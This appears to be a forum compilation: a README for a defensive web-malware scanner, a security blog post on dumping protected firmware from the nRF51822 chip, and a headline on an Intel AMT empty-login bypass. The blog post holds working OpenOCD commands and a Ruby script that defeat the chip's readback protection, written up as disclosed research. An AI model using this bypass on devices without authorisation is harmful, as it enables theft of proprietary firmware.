Web Exploit Detector

Introduction

The Web Exploit Detector is a Node.js application (and NPM module) used to detect possible infections, malicious code and suspicious files in web hosting environments. This application is intended to be run on web servers hosting one or more websites. Running the application will generate a list of files that are potentially infected, together with a description of the infection and references to online resources relating to it. As of version 1.1.0 the application also includes utilities to generate and compare snapshots of a directory structure, allowing users to see if any files have been modified, added or removed. The application is hosted on GitHub so that others can benefit from it, as well as allowing others to contribute their own detection rules.

Links

- My website: https://www.polaris64.net/
- My cybersecurity blog, which contains articles describing some of these exploits and how to remove them: https://www.polaris64.net/blog/cyber-security
- Contact me
- NPM module

Installation

Regular users

The simplest way to install Web Exploit Detector is as a global NPM module:

    npm install -g web_exploit_detector

If you are running Linux or another Unix-based OS you might need to run this command as root (e.g. sudo npm install -g web_exploit_detector).

Updating

The module should be updated regularly to make sure that all of the latest detection rules are present. Running the above command will always download the latest stable (tested) version. To update a version that has already been installed, simply run the following:

    npm update -g web_exploit_detector

Again, you may have to use the sudo command as above.
Technical users

You can also clone the Git repository and run the script directly like so:

    git clone https://github.com/polaris64/web_exploit_detector
    cd web_exploit_detector
    npm install

Running

From NPM module

If you have installed Web Exploit Detector as an NPM module (see above) then running the scanner is as simple as running the following command, passing in the path to your webroot (the location of your website files):

    wed-scanner --webroot=/var/www/html

Other command-line options are available; simply run wed-scanner --help to see a help message describing them. Running the script in this way produces human-readable output on the console. This is very useful when running the script with cron, for example, as the output can be sent as an e-mail whenever the script runs. The script also supports writing results to a more computer-friendly JSON format for later processing; to enable this output, see the --output command-line argument.

From cloned Git repository

Simply call the script via node and pass the path to your webroot as follows:

    node index.js --webroot=/var/www/html

Recursive directory snapshots

The Web Exploit Detector also comes with two utilities to help identify files that might have changed unexpectedly. A successful attack on a site usually involves deleting files, adding new files or changing existing files in some way.

Snapshots

A snapshot (as used by these utilities) is a JSON file which lists all files together with a description of their contents at the point at which the snapshot was created. If a snapshot was generated on Monday, for example, and the site was attacked on Tuesday, then running a comparison between this snapshot and the current site files afterwards will show that one or more files were added, deleted or changed. The goal of these utilities is therefore to allow these snapshots to be created and the comparisons to be performed when required.
The snapshot stores each file path together with a SHA-256 hash of the file contents. A hash, or digest, is a small summary of a message, which in this case is the file's contents. If the file contents change, even in a very small way, the hash becomes completely different. This provides a good way of detecting any changes to file contents.

Usage

The following two utilities are also installed as part of Web Exploit Detector:

- wed-generate-snapshot: allows a snapshot to be generated for all files (recursively) in a directory specified by --webroot. The snapshot will be saved to a file specified in the --output option.
- wed-compare-snapshot: once a snapshot has been generated it can be compared against the current contents of the same directory. The snapshot to check is specified using the --snapshot option. The base directory to check against is stored within the snapshot, but if the base directory has changed since the snapshot was generated then the --webroot option can be used.

Workflow

Snapshots can be generated as frequently as required, but as a general rule of thumb they should be generated whenever a site is in a clean (non-infected) state and whenever a legitimate change has been made. For CMS-based sites like WordPress, snapshots should be created regularly, as new uploads will cause the current state to diverge from the stored snapshot. For sites whose files should never change, a single snapshot can be generated and then used indefinitely to ensure nothing actually does change.

Usage as a module

The src/web-exploit-detector.js script is an ES6 module that exports the set of rules as "rules", as well as a number of functions:

- executeTests(settings): runs the exploit checker based on the passed settings object. For usage, please consult the index.js script.
- formatResult(result): takes a single test result from the array returned by executeTests() and generates a string of results ready for output for that test.
- getFileList(path): returns an array of files from the base path using readDirRecursive().
- processRulesOnFile(file, rules): processes all rules from the array rules on a single file (string path).
- readDirRecursive(path): recursive function which returns a Promise which is resolved with an array of all files in path and its sub-directories.

The src/cli.js script is a simple command-line interface (CLI) to this module, as used by the wed-scanner script, so reading it shows one way in which the module can be used. The project uses Babel to compile the ES6 modules in "src" to plain JavaScript modules in "lib". If you are running an older version of Node.js then the modules can be require()'d from the "lib" directory instead.

Building

The package contains Babel as a dev-dependency together with the "build" and "watch:build" scripts. When running the "build" script (npm run build), the ES6 modules in "./src" are compiled and saved to "./lib", where they are included by the CLI scripts. The "./lib" directory is included in the repository so that any user can clone the repository and run the application directly without having to install dev-dependencies and build the application.

Excluding results per rule

Sometimes rules, especially those tagged with "suspicion", will identify a clean file as a potential exploit. Because of this, a system to allow files to be excluded from being checked by a rule is also included. The wed-results-to-exceptions script takes an output file from the main detector script (see the --output option) and gives you the choice to exclude each file in turn for each specific rule. All excluded files are stored in a file called wed-exceptions.json (in the user's home directory), which is read by the main script before running the scan. If a file is listed in this file then all attached rules (by ID) will be skipped when checking that file. For usage instructions, simply run wed-results-to-exceptions.
You will need a valid output JSON file from a previous run of the main detector first, generated using the --output option. For users working directly with the Git repository, run node results_to_exceptions.js in the project root directory.

Rule engine

The application operates using a collection of "rules" which are loaded when the application is run. Each rule consists of an ID, name, description, list of URLs, tags, a deprecation flag and, most importantly, a set of tests. Each individual test must be one of the following:

- A regular expression: the simplest type of test; any value matching the regex will pass the test.
- A Boolean callback: the callback function must return a Boolean value indicating whether the value passes the test. The callback is free to perform any synchronous operations.
- A Promise callback: the callback function must return a Promise which is resolved with a Boolean value indicating whether the value passes the test. This type of callback is free to perform any asynchronous operations.

The following test types are supported:

- "path": used to check the file path. This test must exist and should evaluate to true if the file path is considered to match the rule.
- "content": used to check the contents of a file. This test is optional, and file contents will only be read and sent to rules that implement this test type. When this test is a function, the content (string) is passed as the first argument and the file path as the second argument, allowing the test to perform additional file operations.

Expanding on the rules

As web-based exploits are constantly evolving and new exploits are being created, the set of rules needs to be updated too. As I host a number of websites I am constantly observing new kinds of exploits, so I will be adding to the set of rules whenever I can. I run this tool on my own servers, so of course I want it to be as functional as possible!
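As a rough illustration of the test styles described above, here is a hypothetical rule with a regex "path" test and a Promise-based "content" test, together with a toy evaluator. The schema and names are illustrative only, not the project's actual rule format:

```javascript
// Hypothetical rule: flag PHP files containing an eval(base64_decode(...)) call.
const rule = {
  id: 'example:php:eval_base64',
  tests: {
    path: /\.php$/,                        // regex test on the file path
    content: (content, path) =>            // Promise callback test on the contents
      Promise.resolve(/eval\s*\(\s*base64_decode/.test(content)),
  },
};

// A value passes a regex test if it matches, and a callback test if the
// callback returns (or resolves to) true.
async function runTest(test, value, path) {
  if (test instanceof RegExp) return test.test(value);
  return Promise.resolve(test(value, path));
}

// Run the "path" test first; only matching files have their contents checked.
async function checkFile(path, content) {
  if (!(await runTest(rule.tests.path, path))) return false;
  return runTest(rule.tests.content, content, path);
}

checkFile('shell.php', 'eval(base64_decode("..."));')
  .then(hit => console.log(hit)); // true for this example
```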
This brings me to the reasons why I have made this application available as an open-source project: firstly so that you and others can benefit from it, and secondly so that we can all collaborate on detection rules so that the application is always up to date.

Contributing rules

If you have discovered an exploit that is not detected by this tool then please either contact me to let me know or, even better, write your own rule, add it to the third-party rule-set (rules/third-party/index.js) and send me a pull request. Don't worry if you don't know how to write your own rules; the most important thing is that the rule gets added, so feel free to send me as much information as you can about the exploit and I will try to create a rule for it myself. Rules are categorised, but the simplest way to add your own rule is to add it to the third-party rule-set mentioned above.

Rule IDs are written in the following format: "author:type:sub-type(s):rule-id". For example, one of my own rules is "P64:php:cms:wordpress:wso_webshell". "P64" is me (the author), "php:cms:wordpress" is the grouping (a PHP-specific rule for the Content Management System (CMS) called WordPress) and "wso_webshell" is the specific rule ID. When writing your own rules, try to follow this format, replacing "P64" with your own GitHub username or another unique ID.

Unit tests and linting

The project contains a set of Jasmine tests which can be run using npm test. It also contains an ESLint configuration; ESLint can be run using npm run lint. When developing, tests can also be run whenever a source file changes by running npm run watch:test. To run both tests and ESLint, the npm run watch:all script can be used. Please note that unless you already have Jasmine and/or nodemon installed, you should run npm install in non-production mode to ensure that the dev-dependencies are installed.
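The colon-separated ID format above can be split mechanically into its parts; a small helper for illustration (not part of the project's code):

```javascript
// Split "author:type:sub-type(s):rule-id" into author, grouping and rule ID.
// The first component is the author, the last is the rule ID, and everything
// in between is the grouping.
function parseRuleId(id) {
  const parts = id.split(':');
  return {
    author: parts[0],
    grouping: parts.slice(1, -1).join(':'),
    ruleId: parts[parts.length - 1],
  };
}

console.log(parseRuleId('P64:php:cms:wordpress:wso_webshell'));
// { author: 'P64', grouping: 'php:cms:wordpress', ruleId: 'wso_webshell' }
```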
Credits

Thanks to the Reddit user mayupvoterandomly for suggesting the directory snapshot functionality that was added in 1.1.0, and for suggesting new rules that will be added soon.

License

ISC License

Copyright (c) 2017, Simon Pugnet

Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

Source: https://github.com/polaris64/web_exploit_detector
-
Firmware dumping technique for an ARM Cortex-M0 SoC
by Kris Brosch

One of the first major goals when reversing a new piece of hardware is getting a copy of the firmware. Once you have access to the firmware, you can reverse engineer it by disassembling the machine code.

Sometimes you can get access to the firmware without touching the hardware, for example by downloading a firmware update file. More often, you need to interact with the chip where the firmware is stored. If the chip has an accessible debug port, it may allow you to read the firmware through that interface. However, most modern chips have security features that, when enabled, prevent firmware from being read through the debugging interface. In these situations, you may have to resort to decapping the chip, or to introducing glitches into the hardware logic by manipulating inputs such as power or clock sources and leveraging the resulting behavior to bypass these security implementations.

This blog post discusses a new technique that we've created to dump the firmware stored on a particular Bluetooth system-on-chip (SoC), and how we bypassed that chip's security features using only the chip's debugging interface. We believe this technique is a vulnerability in the code protection features of this SoC, and as such we have notified the IC vendor prior to publication of this blog post.

The SoC

The SoC in question is a Nordic Semiconductor nRF51822. The nRF51822 is a popular Bluetooth SoC with an ARM Cortex-M0 CPU core and built-in Bluetooth hardware. The chip's manual is available here. Chip security features that prevent code readout vary in implementation among the many microcontrollers and SoCs available from various manufacturers, even among those that use the same ARM cores.
The nRF51822's code protection allows the developer to prevent the debugging interface from reading either all of the code and memory (flash and RAM) sections, or just a subsection of these areas. Additionally, some chips have options to prevent debugger access entirely. The nRF51822 doesn't provide such a feature to developers; it just disables memory accesses through the debugging interface.

The nRF51822 has a serial wire debug (SWD) interface: a two-wire (in addition to ground) debugging interface available on many ARM chips. Many readers may be familiar with JTAG as a physical interface that often provides access to hardware and software debugging features of chips. Some ARM cores support a debugging protocol that works over the JTAG physical interface; SWD is a different physical interface that can be used to access the same software debugging features of a chip that ARM JTAG does. OpenOCD is an open source tool that can be used to access the SWD port.

This document contains a pinout diagram of the nRF51822. Luckily, the hardware target we were analyzing has test points connected to the SWDIO and SWDCLK chip pins, with PCB traces that were easy to follow. By connecting to these test points with a SWD adapter, we can use OpenOCD to access the chip via SWD. There are many debug adapters supported by OpenOCD, some of which support SWD.

Exploring the Debugger Access

Once OpenOCD is connected to the target, we can run debugging commands and read/write some ARM registers; however, we are prevented from reading out the code section. In the example below, we connect to the target with OpenOCD and attempt to read memory from the target chip. We reset the processor and read from address 0x00000000 and from the address we determine is in the program counter (pc) register (0x000114cc), but nothing but zeros is returned.
Of course we know there is code there, but the code protection counter-measures are preventing us from accessing it:

    > reset halt
    target state: halted
    target halted due to debug-request, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
    > mdw 0x00000000
    0x00000000: 00000000
    > mdw 0x000114cc 10
    0x000114cc: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
    0x000114ec: 00000000 00000000

We can however read and write CPU registers, including the program counter (pc), and we can single-step through instructions (we just don't know what instructions, since we can't read them):

    > reg r0 0x12345678
    r0 (/32): 0x12345678
    > step
    target state: halted
    target halted due to single-step, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
    > reg pc 0x00011500
    pc (/32): 0x00011500
    > step
    target state: halted
    target halted due to single-step, current mode: Thread
    xPSR: 0xc1000000 pc: 0x00011502 msp: 0x20001bd0

We can also read a few of the memory-mapped configuration registers. Here we are reading a register named "RBPCONF" (short for readback protection) in a collection of registers named "UICR" (User Information Configuration Registers); you can find the address of this register in the nRF51 Series Reference Manual:

    > mdw 0x10001004
    0x10001004: ffff00ff

According to the manual, a value of 0xffff00ff in the RBPCONF register means "Protect all" (PALL) is enabled (bits 15..8, labeled "B" in the manual's table, are set to 0), and "Protect region 0" (PR0) is disabled (bits 7..0, labeled "A", are set to 1).

The PALL feature being enabled is what prevents us from accessing the code section and causes our read commands to return zeros. The other protection feature, PR0, is not enabled in this case, but it's worth mentioning because the protection bypass discussed in this article could bypass PR0 as well. If enabled, it would prevent the debugger from reading memory below a configurable address.
Note that flash (and therefore the firmware we want) exists at a lower address than RAM. PR0 also prevents code running outside of the protected region from reading any data within the protected region. Unfortunately, it is not possible to disable PALL without erasing the entire chip, wiping away the firmware with it. However, it is possible to bypass this readback protection by leveraging our debug access to the CPU.

Devising a Protection Bypass

An initial plan to dump the firmware via a debugging interface might be to load some code into RAM that reads the firmware from flash into a RAM buffer that we could then read. However, we don't have access to RAM because PALL is enabled. Even if PALL were disabled, PR0 could have been enabled, which would prevent our code in RAM (in the unprotected region) from reading flash (in the protected region). This plan won't work if either PALL or PR0 is enabled.

To bypass the memory protections, we need a way to read the protected data and a place to write it that we can access. In this case, only code that exists in protected memory can read protected memory. So our method of reading data will be to jump to an instruction in protected memory using our debugger access, and then to execute that instruction. The instruction will read the protected data into a CPU register, at which point we can read the value out of the CPU register using our debugger access.

How do we know what instruction to jump to? We'll have to blindly search protected memory for a load instruction that will read from an address we supply in a register. Once we've found such an instruction, we can exploit it to read out all of the firmware.

Finding a Load Instruction

Our debugger access lets us write to the pc register in order to jump to any instruction, and it lets us single-step the instruction execution. We can also read and write the contents of the general purpose CPU registers.
In order to read from protected memory, we have to find a load word instruction with a register operand, set the operand register to a target address, and execute that one instruction. Since we can't read the flash, we don't know what instructions are where, so it might seem difficult to find the right instruction. However, all we need is an instruction that reads memory from an address in some register into a register, which is a pretty common operation. A load word instruction would work, or a pop instruction, for example.

We can search for the right instruction using trial and error. First, we set the program counter to somewhere we guess a useful instruction might be. Then, we set all the CPU registers to an address we're interested in and single step. Next, we examine the registers. If we are lucky, the instruction we just executed loaded data from an address stored in another register. If one of the registers has changed to a value that might exist at the target address, then we may have found a useful load instruction. We might as well start at the reset vector: at least we know there are valid instructions there.
Here we're resetting the CPU, setting the general purpose registers and stack pointer to zero (the address we're trying), single stepping, and then examining the registers:

    > reset halt
    target state: halted
    target halted due to debug-request, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
    > reg r0 0x00000000
    r0 (/32): 0x00000000
    > reg r1 0x00000000
    r1 (/32): 0x00000000
    > reg r2 0x00000000
    r2 (/32): 0x00000000
    > reg r3 0x00000000
    r3 (/32): 0x00000000
    > reg r4 0x00000000
    r4 (/32): 0x00000000
    > reg r5 0x00000000
    r5 (/32): 0x00000000
    > reg r6 0x00000000
    r6 (/32): 0x00000000
    > reg r7 0x00000000
    r7 (/32): 0x00000000
    > reg r8 0x00000000
    r8 (/32): 0x00000000
    > reg r9 0x00000000
    r9 (/32): 0x00000000
    > reg r10 0x00000000
    r10 (/32): 0x00000000
    > reg r11 0x00000000
    r11 (/32): 0x00000000
    > reg r12 0x00000000
    r12 (/32): 0x00000000
    > reg sp 0x00000000
    sp (/32): 0x00000000
    > step
    target state: halted
    target halted due to single-step, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114ce msp: 00000000
    > reg
    ===== arm v7m registers
    (0) r0 (/32): 0x00000000
    (1) r1 (/32): 0x00000000
    (2) r2 (/32): 0x00000000
    (3) r3 (/32): 0x10001014
    (4) r4 (/32): 0x00000000
    (5) r5 (/32): 0x00000000
    (6) r6 (/32): 0x00000000
    (7) r7 (/32): 0x00000000
    (8) r8 (/32): 0x00000000
    (9) r9 (/32): 0x00000000
    (10) r10 (/32): 0x00000000
    (11) r11 (/32): 0x00000000
    (12) r12 (/32): 0x00000000
    (13) sp (/32): 0x00000000
    (14) lr (/32): 0xFFFFFFFF
    (15) pc (/32): 0x000114CE
    (16) xPSR (/32): 0xC1000000
    (17) msp (/32): 0x00000000
    (18) psp (/32): 0xFFFFFFFC
    (19) primask (/1): 0x00
    (20) basepri (/8): 0x00
    (21) faultmask (/1): 0x00
    (22) control (/2): 0x00
    ===== Cortex-M DWT registers
    (23) dwt_ctrl (/32)
    (24) dwt_cyccnt (/32)
    (25) dwt_0_comp (/32)
    (26) dwt_0_mask (/4)
    (27) dwt_0_function (/32)
    (28) dwt_1_comp (/32)
    (29) dwt_1_mask (/4)
    (30) dwt_1_function (/32)

Looks like r3 was set to 0x10001014. Is that the value at address zero?
Let's see what happens when we load the registers with four instead:

    > reset halt
    target state: halted
    target halted due to debug-request, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
    > reg r0 0x00000004
    r0 (/32): 0x00000004
    > reg r1 0x00000004
    r1 (/32): 0x00000004
    > reg r2 0x00000004
    r2 (/32): 0x00000004
    > reg r3 0x00000004
    r3 (/32): 0x00000004
    > reg r4 0x00000004
    r4 (/32): 0x00000004
    > reg r5 0x00000004
    r5 (/32): 0x00000004
    > reg r6 0x00000004
    r6 (/32): 0x00000004
    > reg r7 0x00000004
    r7 (/32): 0x00000004
    > reg r8 0x00000004
    r8 (/32): 0x00000004
    > reg r9 0x00000004
    r9 (/32): 0x00000004
    > reg r10 0x00000004
    r10 (/32): 0x00000004
    > reg r11 0x00000004
    r11 (/32): 0x00000004
    > reg r12 0x00000004
    r12 (/32): 0x00000004
    > reg sp 0x00000004
    sp (/32): 0x00000004
    > step
    target state: halted
    target halted due to single-step, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114ce msp: 0x00000004
    > reg
    ===== arm v7m registers
    (0) r0 (/32): 0x00000004
    (1) r1 (/32): 0x00000004
    (2) r2 (/32): 0x00000004
    (3) r3 (/32): 0x10001014
    (4) r4 (/32): 0x00000004
    (5) r5 (/32): 0x00000004
    (6) r6 (/32): 0x00000004
    (7) r7 (/32): 0x00000004
    (8) r8 (/32): 0x00000004
    (9) r9 (/32): 0x00000004
    (10) r10 (/32): 0x00000004
    (11) r11 (/32): 0x00000004
    (12) r12 (/32): 0x00000004
    (13) sp (/32): 0x00000004
    (14) lr (/32): 0xFFFFFFFF
    (15) pc (/32): 0x000114CE
    (16) xPSR (/32): 0xC1000000
    (17) msp (/32): 0x00000004
    (18) psp (/32): 0xFFFFFFFC
    (19) primask (/1): 0x00
    (20) basepri (/8): 0x00
    (21) faultmask (/1): 0x00
    (22) control (/2): 0x00
    ===== Cortex-M DWT registers
    (23) dwt_ctrl (/32)
    (24) dwt_cyccnt (/32)
    (25) dwt_0_comp (/32)
    (26) dwt_0_mask (/4)
    (27) dwt_0_function (/32)
    (28) dwt_1_comp (/32)
    (29) dwt_1_mask (/4)
    (30) dwt_1_function (/32)

Nope, r3 gets the same value, so we're not interested in the first instruction.
Let's continue on to the second:

    > reg r0 0x00000000
    r0 (/32): 0x00000000
    > reg r1 0x00000000
    r1 (/32): 0x00000000
    > reg r2 0x00000000
    r2 (/32): 0x00000000
    > reg r3 0x00000000
    r3 (/32): 0x00000000
    > reg r4 0x00000000
    r4 (/32): 0x00000000
    > reg r5 0x00000000
    r5 (/32): 0x00000000
    > reg r6 0x00000000
    r6 (/32): 0x00000000
    > reg r7 0x00000000
    r7 (/32): 0x00000000
    > reg r8 0x00000000
    r8 (/32): 0x00000000
    > reg r9 0x00000000
    r9 (/32): 0x00000000
    > reg r10 0x00000000
    r10 (/32): 0x00000000
    > reg r11 0x00000000
    r11 (/32): 0x00000000
    > reg r12 0x00000000
    r12 (/32): 0x00000000
    > reg sp 0x00000000
    sp (/32): 0x00000000
    > step
    target state: halted
    target halted due to single-step, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114d0 msp: 00000000
    > reg
    ===== arm v7m registers
    (0) r0 (/32): 0x00000000
    (1) r1 (/32): 0x00000000
    (2) r2 (/32): 0x00000000
    (3) r3 (/32): 0x20001BD0
    (4) r4 (/32): 0x00000000
    (5) r5 (/32): 0x00000000
    (6) r6 (/32): 0x00000000
    (7) r7 (/32): 0x00000000
    (8) r8 (/32): 0x00000000
    (9) r9 (/32): 0x00000000
    (10) r10 (/32): 0x00000000
    (11) r11 (/32): 0x00000000
    (12) r12 (/32): 0x00000000
    (13) sp (/32): 0x00000000
    (14) lr (/32): 0xFFFFFFFF
    (15) pc (/32): 0x000114D0
    (16) xPSR (/32): 0xC1000000
    (17) msp (/32): 0x00000000
    (18) psp (/32): 0xFFFFFFFC
    (19) primask (/1): 0x00
    (20) basepri (/8): 0x00
    (21) faultmask (/1): 0x00
    (22) control (/2): 0x00
    ===== Cortex-M DWT registers
    (23) dwt_ctrl (/32)
    (24) dwt_cyccnt (/32)
    (25) dwt_0_comp (/32)
    (26) dwt_0_mask (/4)
    (27) dwt_0_function (/32)
    (28) dwt_1_comp (/32)
    (29) dwt_1_mask (/4)
    (30) dwt_1_function (/32)

OK, this time r3 was set to 0x20001BD0. Is that the value at address zero?
Let's see what happens when we run the second instruction with the registers set to 4:

    > reset halt
    target state: halted
    target halted due to debug-request, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
    > step
    target state: halted
    target halted due to single-step, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
    > reg r0 0x00000004
    r0 (/32): 0x00000004
    > reg r1 0x00000004
    r1 (/32): 0x00000004
    > reg r2 0x00000004
    r2 (/32): 0x00000004
    > reg r3 0x00000004
    r3 (/32): 0x00000004
    > reg r4 0x00000004
    r4 (/32): 0x00000004
    > reg r5 0x00000004
    r5 (/32): 0x00000004
    > reg r6 0x00000004
    r6 (/32): 0x00000004
    > reg r7 0x00000004
    r7 (/32): 0x00000004
    > reg r8 0x00000004
    r8 (/32): 0x00000004
    > reg r9 0x00000004
    r9 (/32): 0x00000004
    > reg r10 0x00000004
    r10 (/32): 0x00000004
    > reg r11 0x00000004
    r11 (/32): 0x00000004
    > reg r12 0x00000004
    r12 (/32): 0x00000004
    > reg sp 0x00000004
    sp (/32): 0x00000004
    > step
    target state: halted
    target halted due to single-step, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x00000004
    > reg
    ===== arm v7m registers
    (0) r0 (/32): 0x00000004
    (1) r1 (/32): 0x00000004
    (2) r2 (/32): 0x00000004
    (3) r3 (/32): 0x000114CD
    (4) r4 (/32): 0x00000004
    (5) r5 (/32): 0x00000004
    (6) r6 (/32): 0x00000004
    (7) r7 (/32): 0x00000004
    (8) r8 (/32): 0x00000004
    (9) r9 (/32): 0x00000004
    (10) r10 (/32): 0x00000004
    (11) r11 (/32): 0x00000004
    (12) r12 (/32): 0x00000004
    (13) sp (/32): 0x00000004
    (14) lr (/32): 0xFFFFFFFF
    (15) pc (/32): 0x000114D0
    (16) xPSR (/32): 0xC1000000
    (17) msp (/32): 0x00000004
    (18) psp (/32): 0xFFFFFFFC
    (19) primask (/1): 0x00
    (20) basepri (/8): 0x00
    (21) faultmask (/1): 0x00
    (22) control (/2): 0x00
    ===== Cortex-M DWT registers
    (23) dwt_ctrl (/32)
    (24) dwt_cyccnt (/32)
    (25) dwt_0_comp (/32)
    (26) dwt_0_mask (/4)
    (27) dwt_0_function (/32)
    (28) dwt_1_comp (/32)
    (29) dwt_1_mask (/4)
    (30) dwt_1_function (/32)

This time, r3 got 0x000114CD. This value actually strongly implies we're reading memory. Why?
The value is actually the reset vector. According to the Cortex-M0 documentation, the reset vector is at address 4, and when we reset the chip the PC is set to 0x000114CC (the least significant bit is set in the reset vector, changing C to D, because the Cortex-M0 operates in Thumb mode).

Let's try reading the two instructions we were just testing:

    > reset halt
    target state: halted
    target halted due to debug-request, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
    > step
    target state: halted
    target halted due to single-step, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
    > reg r0 0x000114cc
    r0 (/32): 0x000114CC
    > reg r1 0x000114cc
    r1 (/32): 0x000114CC
    > reg r2 0x000114cc
    r2 (/32): 0x000114CC
    > reg r3 0x000114cc
    r3 (/32): 0x000114CC
    > reg r4 0x000114cc
    r4 (/32): 0x000114CC
    > reg r5 0x000114cc
    r5 (/32): 0x000114CC
    > reg r6 0x000114cc
    r6 (/32): 0x000114CC
    > reg r7 0x000114cc
    r7 (/32): 0x000114CC
    > reg r8 0x000114cc
    r8 (/32): 0x000114CC
    > reg r9 0x000114cc
    r9 (/32): 0x000114CC
    > reg r10 0x000114cc
    r10 (/32): 0x000114CC
    > reg r11 0x000114cc
    r11 (/32): 0x000114CC
    > reg r12 0x000114cc
    r12 (/32): 0x000114CC
    > reg sp 0x000114cc
    sp (/32): 0x000114CC
    > step
    target state: halted
    target halted due to single-step, current mode: Thread
    xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x000114cc
    > reg r3
    r3 (/32): 0x681B4B13

The r3 register has the value 0x681B4B13. That disassembles to two load instructions, the first relative to the pc, the second relative to r3:

    $ printf "\x13\x4b\x1b\x68" > /tmp/armcode
    $ arm-none-eabi-objdump -D --target binary -Mforce-thumb -marm /tmp/armcode

    /tmp/armcode:     file format binary

    Disassembly of section .data:

    00000000 <.data>:
       0:   4b13        ldr r3, [pc, #76]   ; (0x50)
       2:   681b        ldr r3, [r3, #0]

In case you don't read Thumb assembly, that second instruction is a load register instruction (ldr); it takes an address from the r3 register, adds an offset of zero, and loads the value from that address into the r3 register.
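As a cross-check on that disassembly, the two 16-bit halfwords packed into 0x681B4B13 (little-endian: 0x4B13 first, then 0x681B) can be decoded by hand from the Thumb encodings. A small sketch covering just these two LDR forms, written in JavaScript purely for illustration:

```javascript
// Decode a 16-bit Thumb instruction, handling only the two LDR encodings
// seen above: LDR (literal) "01001 Rt imm8" and LDR (immediate) "01101
// imm5 Rn Rt". Word-sized loads scale the immediate by 4.
function decodeThumb16(insn) {
  if ((insn & 0xf800) === 0x4800) {        // LDR (literal), pc-relative
    const rt = (insn >> 8) & 0x7;
    const imm = (insn & 0xff) * 4;
    return `ldr r${rt}, [pc, #${imm}]`;
  }
  if ((insn & 0xf800) === 0x6800) {        // LDR (immediate), register base
    const rt = insn & 0x7;
    const rn = (insn >> 3) & 0x7;
    const imm = ((insn >> 6) & 0x1f) * 4;
    return `ldr r${rt}, [r${rn}, #${imm}]`;
  }
  return 'unknown';
}

console.log(decodeThumb16(0x4b13)); // ldr r3, [pc, #76]
console.log(decodeThumb16(0x681b)); // ldr r3, [r3, #0]
```

Decoding 0x681b this way confirms the key property of the gadget: it loads from the address held in r3 back into r3, with no other operands involved.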
We've found a load instruction that lets us read memory from an arbitrary address. Again, this is useful because only code in the protected memory can read the protected memory; the trick is that being able to read and write CPU registers using OpenOCD lets us execute that instruction however we want. If we hadn't been lucky enough to find the load word instruction so close to the reset vector, we could have reset the processor and written a value to the pc register (jumping to an arbitrary address) to try more instructions. Since we were lucky, though, we can just step through the first instruction.

Dumping the Firmware

Now that we've found a load instruction that we can execute to read from arbitrary addresses, our firmware dumping process is as follows:

1. Reset the CPU
2. Single step (we don't care about the first instruction)
3. Put the address we want to read from into r3
4. Single step (this loads from the address in r3 into r3)
5. Read the value from r3

Here's a Ruby script to automate the process:

    #!/usr/bin/env ruby
    require 'net/telnet'

    debug = Net::Telnet::new("Host" => "localhost", "Port" => 4444)
    dumpfile = File.open("dump.bin", "w")
    ((0x00000000 / 4)...(0x00040000 / 4)).each do |i|
      address = i * 4
      debug.cmd("reset halt")
      debug.cmd("step")
      debug.cmd("reg r3 0x#{address.to_s 16}")
      debug.cmd("step")
      response = debug.cmd("reg r3")
      value = response.match(/: 0x([0-9a-fA-F]{8})/)[1].to_i 16
      dumpfile.write([value].pack("V"))
      puts "0x%08x: 0x%08x" % [address, value]
    end
    dumpfile.close
    debug.close

The Ruby script connects to the OpenOCD user interface, which is available via a telnet connection on localhost. It then loops through addresses that are multiples of four, using the load instruction we found to read data from those addresses.

Vendor Response

IncludeSec contacted NordicSemi via their customer support channel, where they received a copy of this blog post.
From NordicSemi customer support: "We take this into consideration together with other factors, and the discussions around this must be kept internal."

We additionally reached out to the only engineer who had security in his title and he didn't really want a follow-up Q&A call or further info and redirected us to only talk to customer support. So that's about all we can do for coordinated disclosure on our side.

Conclusion

Once we have a copy of the firmware image, we can do whatever disassembly or reverse engineering we want with it. We can also now disable the chip's PALL protection in order to more easily debug the code. To disable PALL, you need to erase the chip, but that's not a problem since we can immediately re-flash the chip using the dumped firmware. Once the chip has been erased and re-programmed to disable the protection, we can freely use the debugger to: read and write RAM, set breakpoints, and so on. We can even attach GDB to OpenOCD, and debug the firmware that way.

The technique described here won't work on all microcontrollers or SoCs; it only applies to situations where you have access to a debugging interface that can read and write CPU registers but not protected memory. Despite that limitation, the technique can be used to dump firmware from nRF51822 chips and possibly others that use similar protections. We feel this is a vulnerability in the design of the nRF51822 code protection.

Are you using other cool techniques to dump firmware? Do you know of any other microcontrollers or SoCs that might be vulnerable to this type of code protection bypass? Let us know in the comments.

Sursa: http://blog.includesecurity.com/2015/11/NordicSemi-ARM-SoC-Firmware-dumping-technique.html
How to remote hijack computers using Intel's insecure chips: Just use an empty login string

Exploit to pwn systems using vPro and AMT now public

5 May 2017 at 19:52, Chris Williams

